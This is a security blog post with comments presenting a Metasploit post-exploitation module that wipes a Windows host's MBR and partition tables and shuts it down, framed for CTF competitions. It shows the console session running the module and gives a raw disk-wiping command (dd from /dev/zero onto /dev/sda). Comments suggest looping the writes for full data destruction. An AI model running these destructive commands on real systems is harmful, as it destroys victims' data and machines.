System Kill

Most Metasploit modules are intended to be as "safe" as possible; to get access to a system and get information from it, hopefully without causing any serious crashes, all great for a pen test. But if you're in a CTF or other competition, sometimes you are finished with the system you're on and just want to trash it. So when I saw jcran's competition modules, which includes a wonderful rickroll module, I dug up my system kill script, which starts a disk reformat (wipes the MBR and partition tables with zeros) and shuts down the system. You can download here: kill.rb. Running looks like this:

meterpreter >
Background session 1? [y/N]
msf exploit(ms08_067_netapi) > use post/windows/kill
msf post(kill) > set SESSION 1
msf post(kill) > run

[*] Wiped MBR
[*] Shutting down
[*] Post module execution completed
msf post(kill) > [*] Meterpreter session 1 closed. Reason: Died

At which point, when the system is powered on, you will see a message like "FATAL: No bootable medium found! System halted." or maybe "No Operating System found." or some other wonderful message. Enjoy.

(of course, on *nix you can just dd if=/dev/zero of=/dev/sda and wait for things to start dying)

  1. #1 by Kevin on May 28, 2011 - 3:51 pm

    Cool, thanks for posting. The good thing about this script is that you really didn’t delete any information, simple made it so that BIOS and the bootloader can’t find the operating system.

    As for the dd command you mentioned, they call it “Data Destroyer” for a reason 😉

  2. #2 by scriptjunkie on May 31, 2011 - 12:00 am

    Yes, if you really want to destroy the data, you can put the write into a loop. As it is, it just whacks the MBR/partition tables, which can be recovered, e.g. with gpart, in case you accidentally do this to yourself.

  3. #3 by mshenrick on September 9, 2011 - 8:13 pm

    so it only destroys the MBR and partition table? Would that mean it would be trivial to recover it with testdisk right, cos the data’s still there? (but most windows users don’t know that)

    • #4 by scriptjunkie on September 9, 2011 - 8:36 pm

      Right, like I told Kevin, you can loop it for full destruction. This is faster and should be enough for a CTF, and if you realize later that, oh no, I needed a file off that box, you can still get it later, albeit with some hassle.

  4. #5 by TeNeX on July 15, 2013 - 4:58 am

    Well the github site requires password 🙁
    so this is a post explotation module, and sounds nice 🙂 but maybe if build a loop to write zeros to hd sounds better 😛

    • #6 by scriptjunkie on July 15, 2013 - 10:58 pm

      The github link must have changed; I updated it and it should work now. I thought about doing a loop, it would be easy to edit to do that, but I think the single write is good enough and quick, although possible to recover from.

(will not be published)